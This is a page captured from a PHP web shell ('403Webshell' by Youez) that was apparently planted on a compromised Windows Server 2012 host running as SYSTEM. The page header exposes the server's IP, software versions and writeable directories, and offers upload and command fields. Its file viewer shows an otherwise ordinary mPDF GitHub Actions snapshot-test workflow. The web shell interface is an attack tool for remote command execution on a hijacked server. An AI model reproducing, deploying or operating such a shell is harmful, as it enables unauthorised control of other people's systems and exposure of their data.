403Webshell
Server IP : 172.67.187.206  /  Your IP : 172.71.28.156
Web Server : Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
System : Windows NT WIN-ECQAAA40806 6.2 build 9200 (Windows Server 2012 Standard Edition) i586
User : SYSTEM ( 0)
PHP Version : 5.6.30
Disable Function : NONE
MySQL : ON  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /Inetpub/www/game/vendor/mpdf/mpdf/.github/workflows/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /Inetpub/www/game/vendor/mpdf/mpdf/.github/workflows/snapshots.yml
# https://help.github.com/en/categories/automating-your-workflow-with-github-actions

name: "Snapshot Tests"

on:
  pull_request:
  push:
    branches:
      - "master"
      - "development"
      - "test"

jobs:

  tests:

    name: "Tests"

    runs-on: ubuntu-latest

    steps:
      - name: "Checkout"
        uses: "actions/checkout@v4"

      - name: Update sources and install ghostscript
        uses: awalsh128/cache-apt-pkgs-action@master
        with:
          packages: ghostscript
          version: 1.0
          refresh: true

      - name: Change ImageMagick policy to allow pdf->png conversion.
        run: |
          sudo sed -i 's/none/read|write/' /etc/ImageMagick-6/policy.xml               

      - name: "Install PHP"
        uses: "shivammathur/setup-php@v2"
        with:
          coverage: "none"
          php-version: "8.5"
          extensions: "mbstring, gd, bcmath, bz2, imagick"
          tools: composer:v2
          ini-values: error_reporting=-1

      - name: "Install dependencies"
        run: "composer install --no-interaction --no-progress"

      - name: "Snapshot Tests"
        run: composer test -- --group=snapshot

      - uses: actions/upload-artifact@v4
        if: ${{ failure() }}
        with:
          name: "phpunit-artifact"
          path: tmp/artifacts/
          if-no-files-found: ignore

Youez - 2016 - github.com/yon3zu
LinuXploit